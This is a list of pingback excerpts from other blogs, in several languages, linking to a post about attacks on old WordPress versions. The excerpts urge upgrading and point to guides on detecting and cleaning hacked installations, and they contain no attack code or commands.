  425. [...] Therefore when something happens that increases the number of people getting hacked, such as when a new exploit is discovered, or a security hole in a large host starts getting exploited (like what happened with Network [...]

  426. [...] tidak perlu kuatir karena hacker tidak bisa menyerang wordpress.com. kabar tersebut berasal dari Lorelle di WordPress setelah itu ditemukan bahwa serangan keji tersebut mengeksploitasi keamanan pada versi sebelumnya [...]

  427. [...] Defender – 30 Ways To Secure Your Blog From Attack Anyone Can Do Old WordPress Versions Under Attack How To Completely Clean Your Hacked WordPress Installation Did Your WordPress Site Get [...]

  428. [...] in circles ever since to get this issue resolved. It’s a server level hack, which did grow to infect my WordPress blog, which caused confusion for them as they don’t provide WordPress support (don’t get me [...]

  429. [...] You should also read an articles from WordPress CORE TEAM on why to upgrade and stuffs related to that – http://lorelle.wordpress.com [...]

  430. [...] hack that has been a problem for WordPress, Drupal, Joomla, and other sites for a couple of years. I reported on this in fall of 2009 and all versions of WordPress since have protected from this type of [...]

  431. [...] Infection et nettoyage : Infections et nettoyage: plusieurs blogueurs ont publié des billets qui expliquent comment détecter et nettoyer votre blog: – WordPress Hacker Stikes, How to Fix The Hack That Causes Permalinks / URL Structure Error chez Kingpin SEO – 4 ways to find out if your WordPress installation has been affected by eval / base64_decode chez Digitizor – Old WordPress Versions Under Attack chez Lorelle [...]

  432. [...] alla 2.8.4 sono caldamente invitati ad effettuare quanto prima un upgrade, sono infatti state confermate le notizie recentemente circolate in Rete relativamente ad alcune vulnerabilità che [...]

  433. [...] number of scams, phishing, and malware with WordPress, specifically WordPress Themes, Plugins, and out-of-date versions of WordPress. WordPress expert, Otto of OttoPress investigated a WordPress malware hack last year, uncovering [...]

  434. [...] high profile WordPress blogs that were not updated.  John Gruber over at Daring Fireball has jumped into the fray with some posts on the subject including this new one titled “How Not to Get  Your Blog [...]

  435. [...] Lorelle on WordPress gives us clues to determine if your site has been attacked: There are two clues that your WordPress site has been attacked. [...]

  436. [...] vulnerable – and being hit – by a worm that affects any old (ie before 2.8.4) version.Details are here (and also on WordPress's site). As Matt Mullenweg, who has played a key part in the development and [...]

  437. [...] war­ning comes from Lorelle on Word­Press after it was disco­ve­red that a nasty attack is exploi­ting secu­rity holes in pre­vious [...]

  438. [...] of a mandatory security release. Don’t wait. There are evil doers just waiting for security vulnerabilities on older, out-of-date versions of WordPress, PHP, MySQL, etc. Update immediately and don’t risk your [...]

  439. [...] Old WordPress Versions Under Attack [...]

  440. [...] Old WordPress Versions Under Attack [...]

  441. […] Old WordPress Versions Under Attack […]

  442. […] as of this writing) to avoid an exploit which may place your blog or web site at risk. See the article at “Lorelle on WordPress” for more info. Either use the upgrade link on your WordPress blog’s control panel, or […]

  443. […] These sorts of nefarious requests were implicated in the September 2009 WordPress attacks. […]

Post a Comment

Follow

Get every new post delivered to your Inbox.

Join 20,966 other followers

%d bloggers like this: